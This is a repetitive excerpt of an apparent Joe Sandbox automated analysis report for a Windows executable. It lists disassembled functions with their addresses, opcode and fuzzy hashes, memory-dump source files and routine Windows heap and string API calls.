                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 31ef07464ef63a5c9c9cd39a0443a4b7d3b615bba5a9182160bf04083150539f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0d88d1c80d5cf604edfe207e3e975c6923d32c25b21c0e4bf53f94e4bddbbc5c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31ef07464ef63a5c9c9cd39a0443a4b7d3b615bba5a9182160bf04083150539f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55E18DB1B06A56ABC30A9F79C4805E5F7A5FF4A309B04832EE86C53242D7347467CBC6
                                                                                                                                                                                                                                                                                                  Function 0041C450 Relevance: .3, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8f64cdb3b1d29652fe465c7eda393228ef7c1b6854ad480e8303c0fc9060796f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4cfa1d93c302992564cd6e5d5855d4dbd855d3a9678cd46773ae9a1c723c4c6d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f64cdb3b1d29652fe465c7eda393228ef7c1b6854ad480e8303c0fc9060796f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AD1F975A253118BDB02DFB8C8C05D577A6AF96341B08C37EEC487F20BE738A4428B56
                                                                                                                                                                                                                                                                                                  Function 0041CF70 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0099ba6986021977b459ed1277b3cc7f57074f773dc9ab2e8ab287546e3aad9a
                                                                                                                                                                                                                                                                                                  • Instruction ID: eb1f8b5bbe8e890cce5985e8088739ae93b1079bd2bcff990eab828ac5c7b9b1
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0099ba6986021977b459ed1277b3cc7f57074f773dc9ab2e8ab287546e3aad9a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A431C330D740B049C7809F39C8949E77BE2DB8B206FAD86A7D5D147583D319C64BEB25
                                                                                                                                                                                                                                                                                                  Function 00401170 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                                                                                                  • Instruction ID: a1635671767398927da0aa1816190fc69100bda25571e9e45a237a418de66b7e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d66a49261466e3a3c36ce9d87692c2d08fb70bb342c494509a37dd00358020b8
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85C012B1445208EFD708CB84E512B56B7FCE704720F14406DE40D47740D63A6B00C655
                                                                                                                                                                                                                                                                                                  Function 00401190 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                                                                                                  • Instruction ID: b23bb995dfb30c632528fdc81509a2daafe07b1b64e7ca450f6c4b88134f84f9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7efd6142749fb6bd35262aa098dca2313432ac870eb67428dbbe6dded8a0cce0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51A00236161E83C6D7535614876630971A6AB41AD4F054A64584184A40DB6DC678E501
                                                                                                                                                                                                                                                                                                  Function 0040D250 Relevance: 77.0, APIs: 51, Instructions: 450memorystringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D080: lstrlenA.KERNEL32(?), ref: 0040D09D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D080: strchr.MSVCRT ref: 0040D0B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D080: strchr.MSVCRT ref: 0040D0CE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D080: lstrlenA.KERNEL32(?), ref: 0040D0EA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D080: GetProcessHeap.KERNEL32 ref: 0040D0FB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D080: HeapAlloc.KERNEL32(00000000,00000008,-00000001), ref: 0040D105
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D080: strlen.MSVCRT ref: 0040D130
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040D080: strcpy_s.MSVCRT ref: 0040D184
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,00000000), ref: 0040D2BA
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000000), ref: 0040D2C4
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D2D6
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D2E2
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D2EC
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D318
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D322
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D332
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D33C
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D34E
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D35A
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D364
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D385
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D38F
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D39F
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D3A9
                                                                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 0040D3B7
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D3C3
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3CD
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D3E4
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,-00000001), ref: 0040D3EE
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?), ref: 0040D40F
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040D419
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 0040D429
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 0040D433
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D7C4
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000), ref: 0040D811
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$Process$Free$Alloc$strcpy_s$??3@lstrlenstrchr$strlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2961803143-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 72cdda64b41f2c5f2a1f08ffc243dcb9b35d119eec99e21d0205ef634b2de86d
                                                                                                                                                                                                                                                                                                  • Instruction ID: ca06d6565e22a4b8139dc5fe8ec41e059b536d5ea08dc7ed3398fadcca26eeb0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72cdda64b41f2c5f2a1f08ffc243dcb9b35d119eec99e21d0205ef634b2de86d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7F1D5B19043005BD710ABA5CD49B6FBBE9EF85714F04083EF986972D1D778AC48CB9A
                                                                                                                                                                                                                                                                                                  Function 00412E50 Relevance: 65.2, APIs: 26, Strings: 11, Instructions: 424stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00412E74
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00412EC4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410240: lstrlenA.KERNEL32(?,?,?,00417367,0042150A,0042150A,?,?,?,?,00418606), ref: 00410249
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410240: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,?,00418606), ref: 0041027A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
